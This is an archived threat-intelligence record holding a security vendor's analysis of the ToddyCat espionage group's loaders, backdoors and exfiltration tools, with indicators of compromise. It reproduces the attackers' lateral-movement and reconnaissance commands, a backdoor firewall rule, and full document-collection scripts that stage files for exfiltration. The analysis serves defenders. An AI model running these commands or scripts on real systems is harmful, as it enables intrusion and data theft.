{ "id": "877c8dbf-02fe-450c-ad29-9bd977cf964d", "created_at": "2026-04-06T00:07:36.947165Z", "updated_at": "2026-04-10T03:33:16.322289Z", "deleted_at": null, "sha1_hash": "b2b3cd4420f01a962c6e8eb84fdc704c174f3fd9", "title": "ToddyCat: Keep calm and check logs", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 587764, "plain_text": "ToddyCat: Keep calm and check logs\r\nBy Giampaolo Dedola\r\nPublished: 2023-10-12 · Archived: 2026-04-05 14:07:37 UTC\r\nToddyCat is an advanced APT actor that we described in a previous publication last year. The group started its activities in\r\nDecember 2020 and has been responsible for multiple sets of attacks against high-profile entities in Europe and Asia.\r\nOur first publication was focused on their main tools, Ninja Trojan and Samurai Backdoor, and we also described the set of\r\nloaders used to launch them. We described how the attacker compromised publicly exposed servers using a vulnerability in\r\nMicrosoft Exchange, how they targeted desktops by sending malicious loaders, and how they guarantee their persistence\r\nusing a multi-stage loading scheme.\r\nDuring the last year, we discovered a new set of loaders developed from scratch and collected additional information about\r\ntheir post-exploitation activities. The discovered information allowed us to expand our knowledge of this group and obtain\r\nnew information about the attacker’s TTPs (Tactics, Techniques and Procedures). In this article, we’ll describe their new\r\ntoolset, the malware used to steal and exfiltrate data, and the techniques used by this group to move laterally and conduct\r\nespionage operations.\r\nStandard loaders\r\nThe loaders are 64-bit libraries that are invoked by rundll32.exe or side-loaded with legitimate and signed executable files.\r\nThese components are used during the infection phase to load the Ninja Trojan as a second stage. We’ve seen three variants\r\nof these new loaders:\r\nDifferences Variant “Update” A Variant “VLC” A Variant “VLC” B\r\nLibrary loaded by rundll32.exe vlc.exe vlc.exe\r\nMalicious code\r\nresides in\r\nDllMain libvlc_new libvlc_new\r\nLoaded file update.bin playlist.dat playlist.dat\r\nNext stage loaded\r\nin\r\nCurrent process memory Current process memory\r\nInjected in new wusa.exe\r\nprocess memory\r\nNext stage\r\nLibrary, which exports a\r\nfunction named “Start”\r\nLibrary, which exports a\r\nfunction named “_”\r\nShellcode\r\nThe first variant was observed with a filename such as update.dll or x64.dll and it is usually loaded with the legitimate\r\nrundll32.exe Windows utility. Most of the malicious code resides in the DllMain, but the next stage is invoked with the\r\nexported function Start. The other two variants should be loaded with the legitimate VLC.exe media player, which is abused\r\nto sideload the malicious library.\r\nThe loader starts its activities by loading an encrypted payload from another file that should be present in the same directory.\r\nThe loaded data are then decoded using XOR, where the XOR key is generated using an unusual technique. The malware\r\nuses a static seed to generate a 256-byte XOR_KEY block using shuffle and add operations.\r\nhttps://securelist.com/toddycat-keep-calm-and-check-logs/110696/\r\nPage 1 of 17\n\nXOR_SEED: 00 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00\r\nThe resulting XOR_KEY block is shuffled again using another embedded 64-byte IDX block as an index to obtain a specific\r\n256-bytes XOR key. The XOR key is used to decrypt the file contents and the resulting value is loaded in memory.\r\nVariants Update A and VLC A load the next stage in their process address space and the decrypted payload should be a\r\nlibrary that exports a function with a specific name: “Start” or “_” depending on the variant.\r\nVariant VLC B creates a new wusa.exe (Windows Update Standalone Installer) process, which is a legitimate Windows\r\nprogram located in the System32 directory. It then injects the decrypted payload into the address space of the remote process\r\naddress space and runs it using the CreateRemoteThread function.\r\nTailored loader\r\nDuring our investigation we noticed that on certain targets the attackers replaced the standard loaders with another variant\r\nthat we called a tailored loader because the encrypted file is tailored for the specific system.\r\nThe code is similar to the standard loader – variant VLC A. The main differences are the location and the filename of the\r\nencrypted file:\r\n%CommonApplicationData%\\Local\\user.key\r\nand the decryption scheme used to obtain the final payload.\r\nIt employs the same algorithm mentioned above, where an XOR_SEED is used to generate a 256-byte XOR_KEY block,\r\nwhich is then mixed using another embedded 64-byte IDX block. Before mixing the two blocks, the malware collects the\r\nPhysicalDrive0 storage properties to obtain the drive model.\r\nhttps://securelist.com/toddycat-keep-calm-and-check-logs/110696/\r\nPage 2 of 17\n\nSnippet of code used to get storage properties\r\nAnd uses the GetVolumeNameForVolumeMountPointA function to retrieve the “C:\\” Volume GUID.\r\nSnippet of code used to get Volume GUID\r\nThe two values are used consecutively as the XOR key to modify the IDX block. This approach indicates that the encrypted\r\npayload stored in the user.key is tailored for the targeted system.\r\nBased on our observations, we believe the tailored loader is used to maintain long-term persistence. The technique used to\r\nachieve this goal is the same as that used by the threat actor’s Samurai backdoor, which allows the attacker to hide the\r\nmalware in the svchost.exe address space.\r\nIn this case, the attacker creates the following registry key:\r\nRegistry Key: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost\r\nValue name: fontcsvc\r\nValue: FontCacheSvc\r\nThis registry key is designed to force the legitimate svchost.exe process to load the FontCacheSvc service during system\r\nstartup. The command line of the process will look like this:\r\nC:\\Windows\\system32\\svchost.exe -k fontcsvc -s FontCacheSvc\r\nThe attacker also creates a new service that is configured to load the tailored loader, which is usually stored with filename\r\napibridge.dll.\r\nhttps://securelist.com/toddycat-keep-calm-and-check-logs/110696/\r\nPage 3 of 17\n\nRegistry Key: $HKLM\\System\\ControlSet\\Services\\FontCacheSvc\\Parameters\r\nValue name: ServiceDll\r\nValue: %ProgramFiles%\\Common Files\\System\\apibridge.dll\r\nRegistry Key: $HKLM\\System\\ControlSet\\Services\\FontCacheSvc\\Parameters\r\nValue name: ServiceMain\r\nValue: Start\r\nNinja\r\nThe final stage loaded by the previously described components was the Ninja agent. This is sophisticated malware written in\r\nC++, probably part of an unknown post-exploitation toolkit developed by ToddyCat. We described it in our previous\r\npublication:\r\nThe agent is a powerful tool that provides various functionalities, including but not limited to:\r\nEnumeration and management of running processes;\r\nFile system management;\r\nManagement of multiple reverse shell sessions;\r\nInjection of code into arbitrary processes;\r\nLoading of additional modules (possibly plugins) during runtime;\r\nProxy functionality to forward TCP packets between the C2 and a remote host.\r\nThe latest version of the agent supports the same commands as described in the previous report, but with a different\r\nconfiguration. While the previous version obfuscated the embedded config with the XOR key 0xAA, the new version uses a\r\nNOT binary operation for the same purpose.\r\nAlthough the information contained in the config remains the same, the mutex name has been moved to after the HTTP\r\nheaders.\r\nLoFiSe\r\nThis is a component designed to find and collect files of interest on targeted systems. The name LoFiSe derived from the\r\nmutex name used by this tool (‘MicrosoftLocalFileService’). The tool itself is a DLL file named DsNcDiag.dll that is\r\nlaunched using the DLL side-loading technique. The legitimate executable file with digital signature and original name\r\nnclauncher.exe from the software package Pulse Secure Network Connect 8.3 is used as a loader. The following paths and\r\nfile names are known on attacked systems:\r\nC:\\Program Files\\Windows Mail\\AcroRd64.exe\r\nC:\\Program Files\\Windows Mail\\DsNcDiag.dll\r\nC:\\Program Files\\Common Files\\VLCMedia\\VLCMediaUP.exe\r\nC:\\Program Files\\Common Files\\VLCMedia\\DsNcDiag.dll\r\nAfter the launch, LoFiSe starts to track the changes in the file system. All drives in the system are monitored. After a file\r\ncreation or modification event is received, the tool performs several checks. It filters the files that are larger than 6400000\r\nhttps://securelist.com/toddycat-keep-calm-and-check-logs/110696/\r\nPage 4 of 17\n\nbytes (~6 MB) in size. Files from certain folders are also filtered. These are all files that contain ProgramData in their full\r\npath, or the files that are already stored in the LoFiSe working directories.\r\nThe following are the working directories where the tool is known to store its files, depending on the version:\r\nC:\\Programdata\\Microsofts\\\r\nC:\\windows\\temp\\\r\nAt the next stage, the file extension is checked against the following masks:\r\n*.doc, *.docx, *.xls, *.xlsx, *.ppt, *.pptx, *.pdf, *.rtf, *.tif, *.odt, *.ods, *.odp, *.eml, *.msg\r\nIf the file has passed all the checks and is suitable for collection, the LoFiSe calculates its MD5 hash, which it uses to check\r\npreviously copied files, and stores this information in the database. The database file is called Date.db in all known versions\r\nof the tool is created in the working directory. Two tables are added to the database:\r\nFile paths in the database\r\nhttps://securelist.com/toddycat-keep-calm-and-check-logs/110696/\r\nPage 5 of 17\n\nOther stored data\r\nIf the file MD5 is not in the table, it will be added to the working directory.\r\nEvery three hours, LoFiSe collects all the files from the working directory into a password-protected ZIP-archive and puts it\r\ninto a separate folder for further exfiltration:\r\nLogs generated when preparing the collected data\r\nhttps://securelist.com/toddycat-keep-calm-and-check-logs/110696/\r\nPage 6 of 17\n\nDropBox uploader\r\nThis is a generic DropBox uploader that can be used by anyone to upload data to the popular file hosting service. The tool is\r\nprobably not exclusively used by ToddyCat, but we observed the group using it to exfiltrate stolen documents.\r\nThis small utility accepts a DropBox user access token as an argument. It then parses the current working directory and\r\nuploads files with the following extensions:\r\n.z;.001;.002;.003;.004;.005;.006;.007;.008;.009;.010;.011;.012;.013;.014;.015\r\nIn the course of our investigation, we identified several other similar samples, which were protected by different packers and\r\ndetected only in Southeast Asia. However, in some cases the tool was found on systems that were not obviously infected by\r\nToddyCat.\r\nPcexter\r\nThis is another uploader used to exfiltrate archive files to Microsoft OneDrive. This tool was distributed as a DLL file\r\nnamed Vspmsg.dll that was executed using the DLL side-loading technique. As a loader, the tool uses a legitimate executable\r\nfile from Visual Studio, VSPerfCmd, which is used to collect performance data. The known paths where these executables\r\nwere staged on attacked systems are:\r\nc:\\windows\\temp\\googledrivefs.exe\r\nC:\\windows\\temp\\vspmsg.dll\r\nc:\\program files\\windows mail\\securityhealthsystray64.exe\r\nc:\\program files\\windows mail\\vspmsg.dll\r\nc:\\program files\\common files\\vlcmedia\\vlcmediastatus.exe\r\nc:\\program files\\common files\\vlcmedia\\vspmsg.dll\r\nThis tool expects the following arguments:\r\nFlag Description\r\n–proxy Proxy address to be used via InternetOpenA\r\n—user, –pwd Proxy credentials\r\n-d The folder containing the files to upload\r\n–rex Mask with which the tool looks for files to send\r\nAfter the launch, Pcexter waits for the event “Global\\SystemLocalPcexter” to fire and then starts searching for files in the\r\nspecified directory using the given mask. This is the event that is set by the LoFiSe tool when it is creating the archive to\r\nsend.\r\nPcexter uses OneDrive OAuth 2.0 authorization, retrieves an access token and sends files via the POST method:\r\nMethod: POST\r\nhttps://securelist.com/toddycat-keep-calm-and-check-logs/110696/\r\nPage 7 of 17\n\nURL: https://login.microsoftonline.com/common/oauth2/v2.0/token\r\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\r\nExpect: 100-continue\r\nclient_id=\u003cclient_id\u003e\u0026scope=offline_access%20files.readwrite.all\r\nrefresh_token=\r\n\u003crefresh_token\u003e\u0026redirect_uri=https://login.microsoftonline.com/common/oauth2/nativeclient\u0026grant_type=refresh_token\r\nPassive UDP backdoor\r\nThis is a tiny passive backdoor that receives commands with UDP packets. The attacker usually executes the following\r\ncommand remotely via a task before executing this backdoor:\r\ncmd /c start /b netsh advfirewall firewall add rule name=\"SGAccessInboundRule\" dir=in protocol=udp action=allow\r\nlocalport=49683\r\nThis command creates a new firewall rule named SGAccessInboundRule on the targeted host. It allows the backdoor to\r\nreceive UDP packets on port 49683. After running this command, the attacker executes the backdoor:\r\nc:\\programdata\\microsoft\\network\\aspnet.exe 49683\r\nThe backdoor’s logic is simple: it binds a UDP socket to a specified port, decompresses the received data, and executes the\r\nresulting string using the WinExec function. Once the command is executed, the backdoor sends feedback about the\r\ncommand execution by returning a message that contains the current system time and the executed command. However, the\r\nbackdoor does not provide the output of the command.\r\nThe exact purpose of this backdoor is currently unknown, but it’s possible that it’s used to provide additional persistence in\r\ncase other implants are detected.\r\nCobaltStrike\r\nDuring our investigation, we observed the attacker using CobaltStrike before deploying the Ninja agent. Specifically, we\r\nobserved the use of a loader written in C++ and located at:\r\nC:\\ProgramData\\Microsoft\\mf\\windef.dll\r\nThe malware loads an embedded resource called “BIN”. The resource content is deobfuscated using an XOR algorithm and\r\na key embedded in the code: B0 9A E4 EA F7 BE B7 B0.\r\nThe resulting payload is the CobaltStrike beacon, configured to communicate with the following URL:\r\nhxxps://www.githubdd.workers[.]dev/fam/mfe?restart=false\r\nApproximately 10 minutes after the infection, ToddyCat Ninja was detected on the system.\r\nhttps://securelist.com/toddycat-keep-calm-and-check-logs/110696/\r\nPage 8 of 17\n\nPost-exploitation\r\nThe latest discoveries confirm that ToddyCat attacks its target to perform espionage activities. To achieve this goal, the\r\nattacker penetrates corporate networks using tools such as the loaders and Trojans described above. Once it has gained a\r\nfoothold, it starts to collect information about the hosts connected to the same network to find targets that might have files of\r\ninterest.\r\nThe group performs discovery activities, enumerating domain accounts and DC servers by leveraging standard operating\r\nsystem administration utilities such as net and ping:\r\nnet group \"domain admins\" /dom\r\nnet user %USER% /dom\r\nnet group \"domain computers\" /dom | findstr %VALUABLE_USER%\r\nping %REMOTE_HOST% -4\r\nAfter identifying potential targets, the group moves laterally by locally mounting network shares using compromised\r\ndomain admin credentials:\r\nnet use \\\\%REMOTE_HOST%\\c$ \"%PASSWORD%\" /user:%USER%\r\nnet use \\\\%IP_ADDRESS%\\c$ \"%PASSWORD%\" /user:%USER%\r\nThe attackers take care to rotate the credentials used over time; the same credentials are unlikely to be used for a long time.\r\nAfter copying a script, a scheduled task is created, executed and immediately deleted along with the network share, all\r\ncyclically for each targeted host:\r\nschtasks /s %REMOTE_HOST% /tn %TASK_NAME% /u %DOMAIN%\\%USER% /p %PASSWORD% /create /ru\r\nsystem /sc DAILY /tr \"%COMMAND%\" /f\r\nschtasks /run /s %REMOTE_HOST% /tn %TASK_NAME% /u %USER% /p \"%PASSWORD%\" /i\r\nschtasks /delete /s %REMOTE_HOST% /tn %TASK_NAME%  /u %USER% /p \"%PASSWORD%\" /f\r\nnet use \\\\%IP_ADDRESS%\\c$ /del /y\r\nThe scheduled task can typically contain a single discovery command, a binary call or a PS1 or BAT script that takes care of\r\nperforming the collection activity.\r\nDuring lateral movement, the output of single-command scheduled tasks is saved in a specific file so that it can be captured\r\nby the attacker who mounts the remote drive as a local share:\r\n1 Get process list\r\nhttps://securelist.com/toddycat-keep-calm-and-check-logs/110696/\r\nPage 9 of 17\n\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n\"cmd\" /c start /b tasklist /v \u003e\u003e c:\\users\\public\\d\r\nGet information about bootable drives\r\ncmd /c start /b powershell -c Get-WmiObject -Query {SELECT * FROM Win32_DiskPartition WHERE Bootable\r\n= TRUE} \u003e\u003e c:\\users\\public\\d\r\nGet remove drive model, vendor name and serial number\r\ncmd /c start /b wmic diskdrive where Name=\"\\\\.\\PHYSICALDRIVE0\" get model,name,SerialNumber \u003e\u003e\r\nc:\\users\\public\\d\r\nGet systeminfo\r\ncmd /c start /b systeminfo \u003e\u003e c:\\users\\public\\d\r\nCheck current TCP ports status\r\ncmd /c netstat -anop tcp \u003e\u003e c:\\users\\public\\d\r\nTest internet connection\r\ncmd /c ping 8.8.8.8 -n 2 \u003e\u003e c:\\users\\public\\d\r\nCheck if Kaspersky endpoint is running on remote host\r\ncmd /c wmic process where name=\"avp.exe\" get processid,executablepath,name,creationdate,CommandLine \u003e\u003e\r\nC:\\users\\public\\d\r\nIndicator removal\r\ncmd /c start /b del c:\\programdata\\intel\\%.SCRIPT_NAME%.ps1\r\nMoving to the root directory using impacket wmiexec\r\ncmd.exe /Q /c cd \\ 1\u003e \\\\127.0.0.1\\ADMIN$\\__%TIMESTAMP% 2\u003e\u00261\r\nIn the case of running a script, the commands are as follows. We then observed that the same PowerShell commands found\r\nin the PS1 script were wrapped in a BAT script, presumably to avoid detection.\r\nHowever, some folders seem to be favored over others:\r\nhttps://securelist.com/toddycat-keep-calm-and-check-logs/110696/\r\nPage 10 of 17\n\ncmd /c start /b powershell.exe -exec bypass -c \"c:\\programdata\\intel\\%SCRIPT_NAME%.ps1\" %INTEGER%\r\nc:\\users\\public\\%SCRIPT_NAME%.bat\r\n\"cmd\" /c start /b powershell.exe -exec bypass \". \"c:\\users\\public\\%SCRIPT_NAME%.ps1\"\" \u003e c:\\users\\public\\d\r\nThe group reuses the same task names for the same session; such names are usually chosen to arouse less suspicion, such as\r\n“one” and “tpcd”, while script names can vary from two to four random keyboard-walking characters with higher entropy.\r\nAt the end of the activity, a temporary share is mounted and then deleted on the exfiltration host:\r\nnet share tmp=c:\\windows\\debug /grant:everyone,full\r\nnet share tmp /del /y\r\nData collection and exfiltration\r\nAs mentioned in the previous section, once the target of interest has been identified, the collection phase begins. The threat\r\nactor usually collects files from many different hosts and stores them in archives that are then exfiltrated from the targeted\r\nnetwork using public file storage services.\r\nData theft scheme\r\nWe have already described some tools, such as LoFiSe, specifically developed to identify and collect files of interest, but\r\nduring the investigation we also discovered other scripts used by ToddyCat to enumerate the files on the targeted host’s disks\r\nusing WMI and collect recently modified documents having .pdf, .doc, .docx, .xls and .xlsx extensions.\r\nIn these cases, compression is performed using tools such as 7zip or the RAR utility; the specific tools are likely chosen\r\nbased on what is already available within the infrastructure. Unlike LoFiSe, the collection scripts store the paths of the\r\nenumerated documents in a plain text TXT file. Document compression can be done directly on the target host or on the\r\nexfiltration host.\r\nBelow is the content of a BAT script that was run on the target hosts:\r\nhttps://securelist.com/toddycat-keep-calm-and-check-logs/110696/\r\nPage 11 of 17\n\n@echo off\r\nmkdir c:\\users\\public\\tmp_ \u003enul 2\u003enul\r\npowershell.exe \"Get-Wmiobject -Class Win32_logicaldisk | where size -gt 0 | select-object -ExpandProperty\r\nDeviceID \u003e\u003e c:\\users\\public\\tmp_\\disk.txt\"\r\npowershell.exe \"get-content c:\\users\\public\\tmp_\\disk.txt | foreach {if ($_ -eq \\\"C:\\\"){dir \\users  -Exclude \"tmp_\" |\r\n%%{dir $_.FullName -File -Recurse -Include '*.pdf', '*.doc', '*.docx', '*.xls', '*.xlsx' | where LastWriteTime -gt (Get-date).AddDays(-4) | %%{$_.FullName} \u003e\u003e c:\\users\\public\\tmp_\\ph.txt} } else{dir $_\\ -File -Recurse -Include\r\n'*.pdf', '*.doc', '*.docx', '*.xls', '*.xlsx' | where LastWriteTime -gt (Get-date).AddDays(-20) | %%{$_.FullName} \u003e\u003e\r\nc:\\users\\public\\tmp_\\ph.txt}}\"\r\npowershell.exe \"get-content c:\\users\\public\\tmp_\\ph.txt | copy-item -Destination c:\\users\\public\\tmp_ -Force -\r\nErrorAction SilentlyContinue\"  \u003enul 2\u003enul\r\nif EXIST C:\"\\Program Files\\\"WinRAR (\r\n    C:\"\\Program Files\\\"WinRAR\\rar.exe a -v200m c:\\users\\public\\tmp_.rar c:\\users\\public\\tmp_ -ep \u003enul 2\u003enul\r\n    rmdir /s /q c:\\users\\public\\tmp_\r\n) else if exist C:\"\\Program Files (x86)\\\"WinRAR (\r\n    C:\"\\Program Files (x86)\\\"WinRAR\\rar.exe a -v200m c:\\users\\public\\tmp_.rar c:\\users\\public\\tmp_ -ep \u003enul 2\u003enul\r\n    rmdir /s /q c:\\users\\public\\tmp_\r\n)\r\nexit\r\nIn the example above, the files were archived in a tmp_ folder; we also observed the use of a folder with a name\r\nparameterized according to the hostname, such as:\r\nThe documents to be collected are also selected based on their last writing time. The files should have a last modified date\r\ngreater than a certain number of days. This number is usually passed as a script argument and can be hardcoded (as in the\r\nprevious example).\r\nThe collection script uses a different strategy when selecting data sources on primary and secondary drives. For a default\r\nWindows primary drive, the script traverses user profile directories (C:\\Users). This approach increases the likelihood of\r\ncapturing valuable data while reducing the processing time required and minimizing the chance of collecting unwanted files.\r\nWhen dealing with external devices and other non-primary storage media, the script opts for a more expedient strategy by\r\nselecting the root directory (\\). While the primary drive is always available, secondary drives may not always be accessible,\r\nrestricting collection opportunities. To mitigate this limitation, the threat actor occasionally expands the temporal range to\r\ninclude older files in its scope on secondary and removable drives (as can be noted in the BAT snippet).\r\nThe following is how the PS1 script is structured instead:\r\n1 [int] $res = 0\r\nhttps://securelist.com/toddycat-keep-calm-and-check-logs/110696/\r\nPage 12 of 17\n\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\nif(!(($args.count -eq 1) -and ([int]::TryParse($args, [ref]$res)))){\r\n   exit\r\n}\r\n$lte = (Get-date).AddDays(-$res)\r\n$hostname = $env:computername + \"_\"\r\n$pt=Split-Path -Parent $MyInvocation.MyCommand.Definition\r\nif (!(Test-Path -path \"$env:tmp\\\\$hostname\")){\r\n   mkdir \"$env:tmp\\$hostname\"\r\n}\r\n$d = Get-Wmiobject -Class Win32_logicaldisk | where size -gt 0 | select-object -ExpandProperty DeviceID\r\nforeach($i in $d){\r\n   if ($i -eq \"C:\"){\r\n       $fp1 = dir c:\\\\users -File -Recurse -Include '*.pdf', '*.doc', '*.docx', '*.xls', '*.xlsx' | where LastWriteTime -gt\r\n$lte | sort LastWriteTime -Descending | %{$_.FullName}\r\n       write-output $fp1 \u003e\u003e \"$env:tmp\\$hostname\\path.txt\"\r\n       $fp1 | copy-item -Destination \"$env:tmp\\$hostname\" -Force -ErrorAction SilentlyContinue\r\n   } else{\r\n       $fp2 = dir $i\\ -File -Recurse -Include '*.pdf', '*.doc', '*.docx', '*.xls', '*.xlsx' | where LastWriteTime -gt $lte |\r\nsort LastWriteTime -Descending | %{$_.FullName}\r\n       write-output $fp2 \u003e\u003e \"$env:tmp\\$hostname\\path.txt\"\r\n       $fp2 | copy-item -Destination \"$env:tmp\\$hostname\" -Force -ErrorAction SilentlyContinue\r\n   }\r\n}\r\nC:'\\Program Files\\'WinRAR\\rar.exe a -v200m \"$env:tmp\\$hostname.rar\" \"$env:tmp\\$hostname\" -ep\r\nremove-item -path \"$env:tmp\\$hostname\" -Recurse\r\nmove-item -path \"$env:tmp\\$hostname.*\" \"$pt\"  -Force -ErrorAction SilentlyContinue\r\nhttps://securelist.com/toddycat-keep-calm-and-check-logs/110696/\r\nPage 13 of 17\n\n31\r\nThe attackers try to evade defenses by protecting the scripts and distributing them with specific droppers that embed the\r\nscript code inside the PE “.text” section.\r\nPowerShell script inside the executable\r\nThe dropper receives two parameters; the first is a password string that must be provided to start the execution, and the\r\nsecond is a number that is actually transferred via the command line to the PS script. Once started, the dropper creates a file\r\nnamed pro.ps1 and executes it via PowerShell:\r\nc:\\users\\public\\mfc.exe letgo 3\r\npowershell.exe -windowstyle hidden -exec bypass \"c:\\users\\public\\pro.ps1\" 3\r\nIn other cases, we observed script variants designed solely to collect data and copy files to specific folders, but without\r\nincluding them in compressed archives. In these cases, the actor executed the script on the remote host using the standard\r\nremote task execution technique. The collected files were then manually transferred to the exfiltration host using the xcopy\r\nutility and finally compressed using the 7z binary:\r\nxcopy \\\\%hostname%\\c$\\programdata\\intel c:\\intel\\%hostname% /f /s /h\r\n7z64 a %hostname%.z %hostname% -v200m\r\nhttps://securelist.com/toddycat-keep-calm-and-check-logs/110696/\r\nPage 14 of 17\n\nThe activity then continues with the actual exfiltration using one of the aforementioned tools, Pcexter or the Dropbox\r\nuploader:\r\ndb_org.exe %Dropbox Auth Bearer%\r\nToddyCat’s indicator of compromise\r\nLoaders\r\n97D0A47B595A20A3944919863A8163D1                          Variant “Update”\r\n828F8B599A1CC4A02A2C3928EC3F5F8B                     Variant “VLC” A\r\n90B14807734045F1E0A47C40DF949AC4                       Variant “VLC” B\r\n0F7002AACA8C1E71959C3EE635A85F14                       Tailored loader\r\nD3050B3C7EE8A80D8D6700624626266D                     Tailored loader\r\nD4D8131ED03B71D58B1BA348F9606DF7                         Tailored loader\r\nPassive UDP backdoor\r\n65AF75986577FCC14FBC5F98EFB3B47E\r\nDropbox exfiltrator\r\nBEBBEBA37667453003D2372103C45BBF\r\nLoFiSe\r\n14FF83A500D403A5ED990ED86296CCC7\r\n4AD609DDDF2C39CDA7BDBE2F9DC279FD\r\nPcexter\r\nD0CD88352638F1AE101C2A13356AB6B7\r\n318C16195F62094DADCC602B547BBE66\r\nDropper\r\nC170F05333041C56BCC39056FECB808F\r\nFile paths\r\nC:\\Program Files\\Windows Mail\\AcroRd64.exe LoFiSe Launcher\r\nC:\\Program Files\\Windows Mail\\DsNcDiag.dll LoFiSe\r\nC:\\Program Files\\Common Files\\VLCMedia\\VLCMediaUP.exe LoFiSe Launcher\r\nC:\\Program Files\\Common Files\\VLCMedia\\DsNcDiag.dll LoFiSe\r\nC:\\windows\\temp\\googledrivefs.exe Pcexter Launcher\r\nC:\\windows\\temp\\vspmsg.dll Pcexter\r\nc:\\program files\\windows mail\\securityhealthsystray64.exe Pcexter Launcher\r\nc:\\program files\\windows mail\\vspmsg.dll Pcexter\r\nhttps://securelist.com/toddycat-keep-calm-and-check-logs/110696/\r\nPage 15 of 17\n\nc:\\program files\\common files\\vlcmedia\\vlcmediastatus.exe Pcexter Launcher\r\nc:\\program files\\common files\\vlcmedia\\vspmsg.dll Pcexter\r\nC:\\users\\public\\mfc.exe Dropper\r\nC:\\Windows\\System32\\up.dll Loader Simple Update\r\nC:\\Windows\\System32\\x64.dll Loader Simple Update\r\nC:\\Intel\\x64.dll Loader Simple Update\r\nC:\\Perflogs\\1.dll Loader Simple Update\r\nC:\\ibmsgtk\\x64.dll Loader Simple Update\r\nC:\\Windows\\Debug\\1.dll Loader Simple Update\r\nC:\\vlcmedia\\libvlc.dll Loader Simple VLC – wusa.exe inject\r\nC:\\restores\\libvlc.dll Loader Simple VLC\r\nC:\\Users\\%User%\\libvlc.dll Loader Simple VLC\r\nC:\\Windows\\System32\\libvlc.dll Loader Simple VLC\r\nC:\\Intel\\libvlc.dll Loader Simple VLC\r\nC:\\Program Files\\Common Files\\vlcmedia\\libvlc.dll Loader Simple VLC – wusa.exe inject\r\nC:\\Program Files\\Common Files\\System\\apibridge.dll Loader Tailored\r\nC:\\System\\apibridge.dll Loader Tailored\r\nc:\\windows\\debug\\aspnet.exe Passive UDP Backdoor\r\nC:\\Microsoft\\network\\aspnet.exe Passive UDP Backdoor\r\nC:\\ProgramData\\Microsoft\\Network\\aspnet.exe Passive UDP Backdoor\r\nc:\\windows\\debug\\svl.exe Passive UDP Backdoor – Not Persistent\r\nC:\\Intel\\db_org.exe DropBox DropBox Uploader\r\nC:\\Debug\\db_org.exe DropBox DropBox Uploader\r\nC:\\Users\\Public\\Downloads\\DB_SIMPLE.exe DropBox DropBox Uploader\r\nC:\\ProgramData\\db_org.exe DropBox DropBox Uploader\r\nC:\\ProgramData\\Microsoft\\XboxLive\\db_org.exe DropBox Uploader\r\nC:\\ProgramData\\VLCMedia\\playlist.dat Encrypted Payload\r\nC:\\Windows\\System32\\update.bin Encrypted Payload\r\nC:\\ibmsgtk\\update.bin Encrypted Payload\r\nhttps://securelist.com/toddycat-keep-calm-and-check-logs/110696/\r\nPage 16 of 17\n\nC:\\Intel\\update.bin Encrypted Payload\r\nC:\\Windows\\Debug\\update.bin Encrypted Payload\r\nC:\\Perflogs\\update.bin Encrypted Payload\r\nC:\\Intel\\playlist.dat Encrypted Payload\r\nC:\\restores\\playlist.dat Encrypted Payload\r\nC:\\Windows\\System32\\playlist.dat Encrypted Payload\r\nC:\\ProgramData\\Local\\user.key Encrypted Payload\r\nDomains\r\nsolitary-dawn-61af.mfeagents.workers[.]dev Ninja C2\r\nwww.githubdd.workers[.]dev CobaltStrike C2\r\nURLs\r\nhxxps://solitary-dawn-61af.mfeagents.workers[.]dev/collector/3.0/ Ninja C2\r\nhxxps://www.githubdd.workers[.]dev/fam/mfe?restart=false CobaltStrike C2\r\nRegistry keys\r\n$HKLM\\System\\ControlSet\\Services\\FontCacheSvc\r\nMutexes\r\nMicrosoftLocalFileService\r\nEvents\r\nGlobal\\SystemLocalPcexter\r\nSource: https://securelist.com/toddycat-keep-calm-and-check-logs/110696/\r\nhttps://securelist.com/toddycat-keep-calm-and-check-logs/110696/\r\nPage 17 of 17", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "MITRE" ], "references": [ "https://securelist.com/toddycat-keep-calm-and-check-logs/110696/" ], "report_names": [ "110696" ], "threat_actors": [ { "id": "d67df52c-a901-4d55-b287-321818500789", "created_at": "2024-04-24T02:00:49.591518Z", "updated_at": "2026-04-10T02:00:05.314272Z", "deleted_at": null, "main_name": "ToddyCat", "aliases": [ "ToddyCat" ], "source_name": "MITRE:ToddyCat", "tools": [ "Cobalt Strike", "LoFiSe", "China Chopper", "netstat", "Pcexter", "Samurai" ], "source_id": "MITRE", "reports": null }, { "id": "4c4e1108-8c11-48e3-91e3-95c24042f3a5", "created_at": "2022-10-25T16:07:24.329539Z", "updated_at": "2026-04-10T02:00:04.939013Z", "deleted_at": null, "main_name": "ToddyCat", "aliases": [ "Operation Stayin’ Alive", "Storm-0247" ], "source_name": "ETDA:ToddyCat", "tools": [ "CHINACHOPPER", "China Chopper", "Cuthead", "FRP", "Fast Reverse Proxy", "Impacket", "Krong", "LoFiSe", "Ngrok", "PcExter", "PsExec", "SIMPOBOXSPY", "Samurai", "SinoChopper", "SoftEther VPN", "TomBerBil", "WAExp" ], "source_id": "ETDA", "reports": null }, { "id": "60d96824-1767-4b97-a6c7-7e9527458007", "created_at": "2023-01-06T13:46:39.378701Z", "updated_at": "2026-04-10T02:00:03.307846Z", "deleted_at": null, "main_name": "ToddyCat", "aliases": [ "Websiic" ], "source_name": "MISPGALAXY:ToddyCat", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434056, "ts_updated_at": 1775791996, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/b2b3cd4420f01a962c6e8eb84fdc704c174f3fd9.pdf", "text": "https://archive.orkl.eu/b2b3cd4420f01a962c6e8eb84fdc704c174f3fd9.txt", "img": "https://archive.orkl.eu/b2b3cd4420f01a962c6e8eb84fdc704c174f3fd9.jpg" } }